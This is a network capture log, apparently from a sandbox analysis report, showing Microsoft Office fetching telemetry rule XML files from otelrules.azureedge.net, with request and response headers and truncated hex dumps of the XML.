                                                                                                                                                                            2024-10-28 18:12:38 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            107192.168.2.44985913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:37 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:38 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:38 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1390
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                                                            x-ms-request-id: 903d1aff-701e-0050-019c-276767000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181238Z-r1755647c666s72wx0z5rz6s6000000006bg00000000f79g
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:38 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            108192.168.2.44986113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:38 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:38 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:38 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                            x-ms-request-id: 3a798620-501e-00a0-0295-279d9f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181238Z-r1755647c666s72wx0z5rz6s6000000006h0000000001fkp
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:38 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            109192.168.2.44986213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:38 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:38 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                            x-ms-request-id: 04ace5c9-101e-007a-5c26-26047e000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181238Z-r1755647c66qg7mpa8m0fzcvy000000006fg00000000ez9y
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:38 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            110192.168.2.44986313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:38 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:38 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1391
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                            x-ms-request-id: c91d50fe-d01e-0049-5267-28e7dc000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181238Z-17fbfdc98bb7jfvg3dxcbz5xm000000003r0000000005sr2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:38 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            111192.168.2.44986413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:38 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:38 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1354
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                            x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181238Z-17fbfdc98bbwj6cp6df5812g4s0000000710000000000r7d
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:38 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            112192.168.2.44986513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:38 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:39 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:39 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                            x-ms-request-id: 19d379a2-b01e-0084-4b5b-28d736000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181239Z-17fbfdc98bbtwz55a8v24wfkdw00000006e000000000fcec
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:39 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            113192.168.2.44986613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:39 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:39 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:39 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                            x-ms-request-id: 44c445c3-601e-003e-0f9c-273248000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181239Z-17fbfdc98bbfmg5wrf1ctcuuun00000005q000000000ft30
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:39 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            114192.168.2.44986713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:39 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:39 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:39 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                            x-ms-request-id: 43b0bec6-701e-0050-4289-286767000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181239Z-17fbfdc98bb6vp4m3kc0kte9cs000000064g00000000bnv2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:39 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            115192.168.2.44986813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:39 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:39 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:39 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                                                                            x-ms-request-id: f459058d-801e-0015-12e0-25f97f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181239Z-r1755647c66tgwsmrrc4e69sk000000004sg000000001qm0
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
